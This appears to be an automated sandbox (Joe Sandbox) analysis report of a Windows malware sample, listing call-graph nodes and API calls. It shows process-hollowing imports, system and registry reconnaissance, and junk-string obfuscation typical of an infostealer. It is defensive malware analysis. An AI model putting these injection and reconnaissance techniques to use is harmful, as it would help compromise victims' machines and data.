17321->17322 17323 30040a 17321->17323 17325 2ff810 lstrcpy 17322->17325 17324 2ff810 lstrcpy 17323->17324 17326 300416 17324->17326 17327 300403 17325->17327 17326->16437 17327->16437 17329 3010b1 K32GetModuleFileNameExA CloseHandle 17328->17329 17330 3010cd 17328->17330 17329->17330 17331 2ff810 lstrcpy 17330->17331 17332 3010de 17331->17332 17332->16467 17449 2ffa60 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 17333->17449 17335 3005c9 17336 3005d0 17335->17336 17337 3005da RegOpenKeyExA 17335->17337 17336->16488 17338 300612 RegCloseKey 17337->17338 17339 3005fb RegQueryValueExA 17337->17339 17338->16488 17339->17338 17341 300976 17340->17341 17342 300a34 17341->17342 17343 30097e CoSetProxyBlanket 17341->17343 17344 2ff810 lstrcpy 17342->17344 17346 3009b1 17343->17346 17345 300a4a 17344->17345 17345->16514 17346->17342 17347 3009df VariantInit 17346->17347 17348 300a00 17347->17348 17453 300cf0 LocalAlloc CharToOemW 17348->17453 17350 300a09 17351 2ff810 lstrcpy 17350->17351 17352 300a17 VariantClear 17351->17352 17352->16514 17354 2ffb56 17353->17354 17354->16529 17355->16542 17357 3002d8 GetProcessHeap RtlAllocateHeap wsprintfA 17356->17357 17359 2ff810 lstrcpy 17357->17359 17360 30032b 17359->17360 17360->16557 17362 2ff810 lstrcpy 17361->17362 17363 2ffc49 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 17362->17363 17364 2ffd11 17363->17364 17370 2ffc7c 17363->17370 17366 2ffd1c 17364->17366 17367 2ffd15 LocalFree 17364->17367 17365 2ffc80 GetLocaleInfoA 17365->17370 17366->16571 17367->17366 17368 2ff9a0 lstrlen lstrcpy lstrcat 17368->17370 17369 2ff8f0 lstrcpy 17369->17370 17370->17364 17370->17365 17370->17368 17370->17369 17371->16584 17373 2ffc1b 17372->17373 17374 2ffbf2 wsprintfA 17372->17374 17373->16599 17374->17373 17376 2ffd8c RegCloseKey 17375->17376 17377 2ffd75 RegQueryValueExA 17375->17377 17376->16616 17377->17376 17382 2ffe52 17378->17382 17389 2ffe0c 17378->17389 17379 2ffe10 GetLastError 17381 2ffea8 17379->17381 17379->17389 17380 300b20 2 API calls 17383 2ffe7b 17380->17383 17384 2ffeb2 17381->17384 17388 300b20 2 API calls 17381->17388 17382->17380 17383->17384 17386 2ffe85 wsprintfA 17383->17386 17384->16630 17386->16630 17388->17384 17389->17379 17389->17384 17390 2ffe3e GetLogicalProcessorInformationEx 17389->17390 17454 300b20 17389->17454 17457 300b40 GetProcessHeap RtlAllocateHeap 17389->17457 17390->17379 17390->17382 17391->16644 17458 300ad0 17392->17458 17395 2fff10 wsprintfA 17395->16658 17398 2ff810 lstrcpy 17397->17398 17399 2fff5a 17398->17399 17400 2fffb3 17399->17400 17401 2ff8a0 2 API calls 17399->17401 17400->16673 17401->17399 17403 2ff810 lstrcpy 17402->17403 17404 30021a CreateToolhelp32Snapshot Process32First 17403->17404 17405 300242 Process32Next 17404->17405 17406 3002a8 CloseHandle 17404->17406 17405->17406 17409 300254 17405->17409 17406->16686 17407 2ff8f0 lstrcpy 17407->17409 17408 2ff9a0 lstrlen lstrcpy lstrcat 17408->17409 17409->17407 17409->17408 17410 300296 Process32Next 17409->17410 17410->17406 17410->17409 17412 2ff810 lstrcpy 17411->17412 17413 2fffd7 RegOpenKeyExA 17412->17413 17414 300013 17413->17414 17430 300030 17413->17430 17416 2ff850 lstrcpy 17414->17416 17415 300033 RegEnumKeyExA 17417 300062 wsprintfA RegOpenKeyExA 17415->17417 17415->17430 17418 300021 17416->17418 17420 3001e1 RegCloseKey RegCloseKey 17417->17420 17421 3000a8 RegQueryValueExA 17417->17421 17418->16700 17419 3001b9 RegCloseKey 17422 3001c7 17419->17422 17420->17422 17423 3001a6 RegCloseKey 17421->17423 17424 3000d8 lstrlen 17421->17424 17425 2ff850 lstrcpy 17422->17425 17423->17430 17424->17423 17424->17430 17426 3001d1 17425->17426 17426->16700 17427 2ff8f0 lstrcpy 17427->17430 17428 300134 RegQueryValueExA 17428->17423 17428->17430 17429 2ff9a0 lstrlen lstrcpy lstrcat 17429->17430 17430->17415 17430->17419 17430->17423 17430->17427 17430->17428 17430->17429 17432 3042ae 17431->17432 17433 2ff8f0 lstrcpy 17432->17433 17434 3042eb 17433->17434 17435 2ff8f0 lstrcpy 17434->17435 17436 304317 17435->17436 17437 2ff8f0 lstrcpy 17436->17437 17438 304323 17437->17438 17439 2ff8f0 lstrcpy 17438->17439 17440 30432f 17439->17440 17441 304338 17440->17441 17445 304354 17440->17445 17442 304340 Sleep 17441->17442 17442->17442 17442->17445 17443 30437c CreateThread WaitForSingleObject 17444 2ff810 lstrcpy 17443->17444 17650 3030f0 17443->17650 17448 3043ae 17444->17448 17445->17443 17460 30c570 17445->17460 17447 304379 17447->17443 17448->16722 17450 2ffabb RegCloseKey 17449->17450 17451 2ffaa5 RegQueryValueExA 17449->17451 17452 2ffacb 17450->17452 17451->17450 17452->17335 17453->17350 17455 300b3a 17454->17455 17456 300b2a GetProcessHeap HeapFree 17454->17456 17455->17389 17456->17455 17457->17389 17459 2ffefa GlobalMemoryStatusEx 17458->17459 17459->17395 17461 30c586 17460->17461 17462 30c57a 17460->17462 17463 30c58b 17461->17463 17466 30bd50 17461->17466 17462->17447 17463->17447 17465 30c5ad 17465->17447 17467 30bd67 17466->17467 17470 30bd74 17466->17470 17467->17465 17468 30bd79 17468->17465 17469 30bd9d lstrcpy 17471 30c085 17469->17471 17472 30bdba 17469->17472 17470->17468 17470->17469 17471->17465 17473 30be14 17472->17473 17529 309c90 lstrlen 17472->17529 17475 30be33 17473->17475 17476 30be26 17473->17476 17478 30be38 17475->17478 17479 30be49 17475->17479 17541 30afe0 17476->17541 17550 30a300 17478->17550 17482 30be4e 17479->17482 17483 30be5f 17479->17483 17480 30be31 17484 30be6f 17480->17484 17562 30a440 17482->17562 17483->17471 17486 30be68 17483->17486 17484->17471 17488 30be77 lstrcpy lstrcpy lstrlen 17484->17488 17568 30a530 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 17486->17568 17489 30beb6 lstrcat 17488->17489 17490 30bece lstrcpy 17488->17490 17489->17490 17491 30bf24 17490->17491 17492 30c093 17491->17492 17493 30c07e 17491->17493 17494 30c0ac 17492->17494 17500 30c0bf 17492->17500 17570 30a6e0 17493->17570 17496 30a6e0 CloseHandle 17494->17496 17497 30c0b3 17496->17497 17497->17465 17498 30c116 17501 30c118 rand 17498->17501 17499 30c0fd GetDesktopWindow GetTickCount srand 17499->17498 17500->17498 17500->17499 17501->17501 17502 30c12a 17501->17502 17503 30c32d 17502->17503 17507 30c33e 17502->17507 17574 30a130 17503->17574 17506 30c370 17512 30c39d CloseHandle 17506->17512 17513 30c3a4 17506->17513 17507->17506 17508 30c362 17507->17508 17509 30c374 17507->17509 17523 30bc30 17508->17523 17509->17506 17584 30a740 17509->17584 17512->17513 17513->17471 17524 30bc3f 17523->17524 17530 309ca6 17529->17530 17531 309cbf StrCmpCA 17530->17531 17532 309cb9 17530->17532 17533 309cd1 17531->17533 17534 309cd7 StrCmpCA 17531->17534 17532->17473 17533->17473 17534->17533 17535 309ce3 StrCmpCA 17534->17535 17535->17533 17536 309cef StrCmpCA 17535->17536 17536->17533 17537 309cfb StrCmpCA 17536->17537 17537->17533 17538 309d07 StrCmpCA 17537->17538 17538->17533 17539 309d13 StrCmpCA 17538->17539 17539->17533 17540 309d1f StrCmpCA 17539->17540 17540->17473 17542 30b019 CreateFileA 17541->17542 17543 30b00e 17541->17543 17544 30b040 17542->17544 17545 30b034 17542->17545 17543->17480 17546 30a300 13 API calls 17544->17546 17545->17480 17547 30b049 17546->17547 17548 30b050 CloseHandle 17547->17548 17549 30b061 17547->17549 17548->17480 17549->17480 17551 30a338 17550->17551 17552 30a429 17550->17552 17551->17552 17553 30a341 SetFilePointer 17551->17553 17552->17480 17554 30a354 17553->17554 17555 30a38e GetLocalTime SystemTimeToFileTime 17553->17555 17630 309d90 GetFileInformationByHandle 17554->17630 17640 309d30 FileTimeToSystemTime 17555->17640 17559 30a367 17559->17552 17561 30a372 SetFilePointer 17559->17561 17560 30a3d5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17560->17480 17561->17480 17563 30a481 17562->17563 17564 30a514 17562->17564 17563->17564 17565 30a489 GetLocalTime SystemTimeToFileTime 17563->17565 17564->17480 17642 309d30 FileTimeToSystemTime 17565->17642 17567 30a4c4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17567->17480 17569 30a5b5 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17568->17569 17569->17484 17571 30a6fa 17570->17571 17572 30a6ec 17570->17572 17571->17471 17572->17571 17573 30a6f3 CloseHandle 17572->17573 17573->17571 17582 30a14b ctype 17574->17582 17583 30a197 17574->17583 17583->17583 17643 30a620 17584->17643 17631 309da9 17630->17631 17632 309db3 GetFileSize 17630->17632 17631->17559 17634 309e27 SetFilePointer ReadFile SetFilePointer ReadFile 17632->17634 17637 309e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17632->17637 17635 309e6e 17634->17635 17634->17637 17636 309e79 SetFilePointer ReadFile 17635->17636 17635->17637 17636->17637 17639 309f5e 17637->17639 17641 309d30 FileTimeToSystemTime 17637->17641 17639->17559 17640->17560 17641->17639 17642->17567 17659 2ffa50 17650->17659 17652 30311f lstrlen 17656 30313a 17652->17656 17658 30312f 17652->17658 17653 2ff850 lstrcpy 17653->17656 17654 2f45d0 44 API calls 17654->17656 17655 2ff8f0 lstrcpy 17655->17656 17656->17653 17656->17654 17656->17655 17657 3031cc StrCmpCA 17656->17657 17657->17656 17657->17658 17659->17652 17660->16729 20253 535d70 20256 535d88 VirtualProtect 20253->20256 20255 53692f 20256->20255

                                      Executed Functions

                                      Function 00307A40 Relevance: 231.7, APIs: 121, Strings: 11, Instructions: 726libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 555 307a40-307a47 556 307efd-307fa1 LoadLibraryA * 9 555->556 557 307a4d-307ef8 GetProcAddress * 50 555->557 558 307fa3-308012 GetProcAddress * 5 556->558 559 308017-30801e 556->559 557->556 558->559 560 3080e1-3080e8 559->560 561 308024-3080dc GetProcAddress * 8 559->561 562 3080ea-308159 GetProcAddress * 5 560->562 563 30815e-308165 560->563 561->560 562->563 564 3081f7-3081fe 563->564 565 30816b-3081f2 GetProcAddress * 6 563->565 566 308204-3082d5 GetProcAddress * 9 564->566 567 3082da-3082e1 564->567 565->564 566->567 568 3082e3-308352 GetProcAddress * 5 567->568 569 308357-30835e 567->569 568->569 570 308360-308386 GetProcAddress * 2 569->570 571 30838b-308392 569->571 570->571 572 308394-3083ba GetProcAddress * 2 571->572 573 3083bf-3083c6 571->573 572->573 574 3084b7-3084be 573->574 575 3083cc-3084b2 GetProcAddress * 10 573->575 576 3084c0-308517 GetProcAddress * 4 574->576 577 30851c-308523 574->577 575->574 576->577 578 308525-308533 GetProcAddress 577->578 579 308538-30853f 577->579 578->579 580 308541-308598 GetProcAddress * 4 579->580 581 30859d-3085a4 579->581 580->581 582 3085a6-3085b2 GetProcAddress 581->582 583 3085b7 581->583 582->583
                                      APIs
                                      • GetProcAddress.KERNEL32(76E00000,02F3A150), ref: 00307A55
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1B0), ref: 00307A6D
                                      • GetProcAddress.KERNEL32(76E00000,02F41BC0), ref: 00307A86
                                      • GetProcAddress.KERNEL32(76E00000,02F41CB0), ref: 00307A9E
                                      • GetProcAddress.KERNEL32(76E00000,02F41B18), ref: 00307AB6
                                      • GetProcAddress.KERNEL32(76E00000,02F41AE8), ref: 00307ACF
                                      • GetProcAddress.KERNEL32(76E00000,02F38AF8), ref: 00307AE7
                                      • GetProcAddress.KERNEL32(76E00000,02F41A40), ref: 00307AFF
                                      • GetProcAddress.KERNEL32(76E00000,02F41C20), ref: 00307B18
                                      • GetProcAddress.KERNEL32(76E00000,02F41D10), ref: 00307B30
                                      • GetProcAddress.KERNEL32(76E00000,02F41B78), ref: 00307B48
                                      • GetProcAddress.KERNEL32(76E00000,02F39EF0), ref: 00307B61
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1F0), ref: 00307B79
                                      • GetProcAddress.KERNEL32(76E00000,02F39FB0), ref: 00307B91
                                      • GetProcAddress.KERNEL32(76E00000,02F39F30), ref: 00307BAA
                                      • GetProcAddress.KERNEL32(76E00000,02F41B30), ref: 00307BC2
                                      • GetProcAddress.KERNEL32(76E00000,02F41AB8), ref: 00307BDA
                                      • GetProcAddress.KERNEL32(76E00000,02F38828), ref: 00307BF3
                                      • GetProcAddress.KERNEL32(76E00000,02F3A1D0), ref: 00307C0B
                                      • GetProcAddress.KERNEL32(76E00000,02F41AD0), ref: 00307C23
                                      • GetProcAddress.KERNEL32(76E00000,02F41BD8), ref: 00307C3C
                                      • GetProcAddress.KERNEL32(76E00000,02F41C50), ref: 00307C54
                                      • GetProcAddress.KERNEL32(76E00000,02F41A58), ref: 00307C6C
                                      • GetProcAddress.KERNEL32(76E00000,02F39F90), ref: 00307C85
                                      • GetProcAddress.KERNEL32(76E00000,02F41A70), ref: 00307C9D
                                      • GetProcAddress.KERNEL32(76E00000,02F41B00), ref: 00307CB5
                                      • GetProcAddress.KERNEL32(76E00000,02F41B48), ref: 00307CCE
                                      • GetProcAddress.KERNEL32(76E00000,02F41BF0), ref: 00307CE6
                                      • GetProcAddress.KERNEL32(76E00000,02F41C08), ref: 00307CFE
                                      • GetProcAddress.KERNEL32(76E00000,02F41C38), ref: 00307D17
                                      • GetProcAddress.KERNEL32(76E00000,02F41C68), ref: 00307D2F
                                      • GetProcAddress.KERNEL32(76E00000,02F41A88), ref: 00307D47
                                      • GetProcAddress.KERNEL32(76E00000,02F41C80), ref: 00307D60
                                      • GetProcAddress.KERNEL32(76E00000,02F35050), ref: 00307D78
                                      • GetProcAddress.KERNEL32(76E00000,02F41CC8), ref: 00307D90
                                      • GetProcAddress.KERNEL32(76E00000,02F41AA0), ref: 00307DA9
                                      • GetProcAddress.KERNEL32(76E00000,02F3A210), ref: 00307DC1
                                      • GetProcAddress.KERNEL32(76E00000,02F41D88), ref: 00307DD9
                                      • GetProcAddress.KERNEL32(76E00000,02F3A230), ref: 00307DF2
                                      • GetProcAddress.KERNEL32(76E00000,02F41D40), ref: 00307E0A
                                      • GetProcAddress.KERNEL32(76E00000,02F41DB8), ref: 00307E22
                                      • GetProcAddress.KERNEL32(76E00000,02F3A090), ref: 00307E3B
                                      • GetProcAddress.KERNEL32(76E00000,02F3A5B0), ref: 00307E53
                                      • GetProcAddress.KERNEL32(76E00000,CreateProcessA), ref: 00307E6A
                                      • GetProcAddress.KERNEL32(76E00000,GetThreadContext), ref: 00307E80
                                      • GetProcAddress.KERNEL32(76E00000,ReadProcessMemory), ref: 00307E97
                                      • GetProcAddress.KERNEL32(76E00000,VirtualAllocEx), ref: 00307EAE
                                      • GetProcAddress.KERNEL32(76E00000,ResumeThread), ref: 00307EC4
                                      • GetProcAddress.KERNEL32(76E00000,WriteProcessMemory), ref: 00307EDB
                                      • GetProcAddress.KERNEL32(76E00000,SetThreadContext), ref: 00307EF2
                                      • LoadLibraryA.KERNEL32(02F41E00,003066E1,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F03
                                      • LoadLibraryA.KERNEL32(02F41DA0,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F15
                                      • LoadLibraryA.KERNEL32(02F41DD0,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F27
                                      • LoadLibraryA.KERNEL32(02F41DE8,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F38
                                      • LoadLibraryA.KERNEL32(02F41D58,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F4A
                                      • LoadLibraryA.KERNEL32(02F41D70,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F5C
                                      • LoadLibraryA.KERNEL32(02F45030,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F6D
                                      • LoadLibraryA.KERNEL32(02F44F10,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F7F
                                      • LoadLibraryA.KERNEL32(dbghelp.dll,?,?,?,?,?,?,?,?,?,?,003101E9,003101E9,003101E9), ref: 00307F8F
                                      • GetProcAddress.KERNEL32(76560000,02F3A2B0), ref: 00307FAB
                                      • GetProcAddress.KERNEL32(76560000,02F44FA0), ref: 00307FC3
                                      • GetProcAddress.KERNEL32(76560000,02F432E8), ref: 00307FDB
                                      • GetProcAddress.KERNEL32(76560000,02F44D90), ref: 00307FF4
                                      • GetProcAddress.KERNEL32(76560000,02F3A2D0), ref: 0030800C
                                      • GetProcAddress.KERNEL32(73940000,02F388F0), ref: 0030802C
                                      • GetProcAddress.KERNEL32(73940000,02F3A410), ref: 00308044
                                      • GetProcAddress.KERNEL32(73940000,02F38C10), ref: 0030805C
                                      • GetProcAddress.KERNEL32(73940000,02F44F40), ref: 00308075
                                      • GetProcAddress.KERNEL32(73940000,02F44FB8), ref: 0030808D
                                      • GetProcAddress.KERNEL32(73940000,02F3A2F0), ref: 003080A5
                                      • GetProcAddress.KERNEL32(73940000,02F3A510), ref: 003080BE
                                      • GetProcAddress.KERNEL32(73940000,02F44EF8), ref: 003080D6
                                      • GetProcAddress.KERNEL32(75450000,02F3A390), ref: 003080F2
                                      • GetProcAddress.KERNEL32(75450000,02F3A310), ref: 0030810A
                                      • GetProcAddress.KERNEL32(75450000,02F44F70), ref: 00308122
                                      • GetProcAddress.KERNEL32(75450000,02F44EC8), ref: 0030813B
                                      • GetProcAddress.KERNEL32(75450000,02F3A330), ref: 00308153
                                      • GetProcAddress.KERNEL32(77050000,02F38850), ref: 00308173
                                      • GetProcAddress.KERNEL32(77050000,02F388A0), ref: 0030818B
                                      • GetProcAddress.KERNEL32(77050000,02F44FD0), ref: 003081A3
                                      • GetProcAddress.KERNEL32(77050000,02F3A3B0), ref: 003081BC
                                      • GetProcAddress.KERNEL32(77050000,02F3A3D0), ref: 003081D4
                                      • GetProcAddress.KERNEL32(77050000,02F38918), ref: 003081EC
                                      • GetProcAddress.KERNEL32(76A70000,02F44E98), ref: 0030820C
                                      • GetProcAddress.KERNEL32(76A70000,02F3A350), ref: 00308224
                                      • GetProcAddress.KERNEL32(76A70000,02F433E8), ref: 0030823D
                                      • GetProcAddress.KERNEL32(76A70000,02F44EB0), ref: 00308255
                                      • GetProcAddress.KERNEL32(76A70000,02F44DD8), ref: 0030826D
                                      • GetProcAddress.KERNEL32(76A70000,02F3A530), ref: 00308286
                                      • GetProcAddress.KERNEL32(76A70000,02F3A490), ref: 0030829E
                                      • GetProcAddress.KERNEL32(76A70000,02F44EE0), ref: 003082B6
                                      • GetProcAddress.KERNEL32(76A70000,02F44F88), ref: 003082CF
                                      • GetProcAddress.KERNEL32(76F40000,02F3A550), ref: 003082EB
                                      • GetProcAddress.KERNEL32(76F40000,02F44E38), ref: 00308303
                                      • GetProcAddress.KERNEL32(76F40000,02F44FE8), ref: 0030831C
                                      • GetProcAddress.KERNEL32(76F40000,02F44F28), ref: 00308334
                                      • GetProcAddress.KERNEL32(76F40000,02F44F58), ref: 0030834C
                                      • GetProcAddress.KERNEL32(761C0000,02F3A3F0), ref: 00308368
                                      • GetProcAddress.KERNEL32(761C0000,02F3A4B0), ref: 00308380
                                      • GetProcAddress.KERNEL32(75540000,02F3A370), ref: 0030839C
                                      • GetProcAddress.KERNEL32(75540000,02F45060), ref: 003083B4
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A570), ref: 003083D4
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A430), ref: 003083EC
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A4D0), ref: 00308405
                                      • GetProcAddress.KERNEL32(6F4C0000,02F44DF0), ref: 0030841D
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A4F0), ref: 00308435
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A450), ref: 0030844E
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A470), ref: 00308466
                                      • GetProcAddress.KERNEL32(6F4C0000,02F3A590), ref: 0030847E
                                      • GetProcAddress.KERNEL32(6F4C0000,HttpQueryInfoA), ref: 00308495
                                      • GetProcAddress.KERNEL32(6F4C0000,InternetSetOptionA), ref: 003084AC
                                      • GetProcAddress.KERNEL32(77070000,02F44E80), ref: 003084C8
                                      • GetProcAddress.KERNEL32(77070000,02F43268), ref: 003084E0
                                      • GetProcAddress.KERNEL32(77070000,02F45000), ref: 003084F9
                                      • GetProcAddress.KERNEL32(77070000,02F45018), ref: 00308511
                                      • GetProcAddress.KERNEL32(77040000,02F3A5D0), ref: 0030852D
                                      • GetProcAddress.KERNEL32(6FE10000,02F44DA8), ref: 00308549
                                      • GetProcAddress.KERNEL32(6FE10000,02F3A5F0), ref: 00308561
                                      • GetProcAddress.KERNEL32(6FE10000,02F45048), ref: 0030857A
                                      • GetProcAddress.KERNEL32(6FE10000,02F44D78), ref: 00308592
                                      • GetProcAddress.KERNEL32(6D2C0000,SymMatchString), ref: 003085AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                      • API String ID: 2238633743-2740034357
                                      • Opcode ID: 5565bb8651eaf3213635e89cdebe0ffed362063621a4d57ac29a7185bd41f792
                                      • Instruction ID: 1bb1b3bb26aa555b8b296f9ef2268c9f418d0273583808313b6621400b3241e4
                                      • Opcode Fuzzy Hash: 5565bb8651eaf3213635e89cdebe0ffed362063621a4d57ac29a7185bd41f792
                                      • Instruction Fuzzy Hash: 166252B59012009FE725DF64ED989663BF9FFAA30130C8519E905C3364E774A84AFF11
                                      Function 002F2000 Relevance: 70.1, APIs: 39, Strings: 1, Instructions: 124stringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2014
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F201B
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2022
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2029
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2030
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 002F203B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F2042
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2052
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2059
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2060
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2067
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F206E
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2079
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2080
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2087
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F208E
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2095
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20AB
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20B2
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20B9
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20C0
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20C7
                                      • lstrlen.KERNEL32(?), ref: 002F20CF
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20F0
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20F7
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F20FE
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2105
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F210C
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F211C
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2123
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F212A
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2131
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2138
                                      • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 002F214D
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2158
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F215F
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2166
